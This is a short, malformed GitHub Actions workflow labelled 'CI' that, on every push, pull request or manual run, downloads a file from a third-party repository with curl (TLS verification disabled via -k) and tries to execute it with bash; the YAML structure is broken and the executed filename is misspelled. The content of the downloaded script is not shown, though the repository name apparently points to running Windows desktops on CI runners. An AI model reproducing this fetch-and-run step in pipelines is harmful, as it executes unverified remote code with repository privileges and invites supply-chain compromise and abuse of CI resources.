name: CI

on:

  push:
  pull_request:

  workflow_dispatch:


    runs-on: ubuntu-latest

        name: Run a one-line script
        run: curl -sLkO https://github.com/kmille36/PWD-Windows-2022/raw/main/alpha-release-2 
        name: run
        run: bash alpha-relese-2
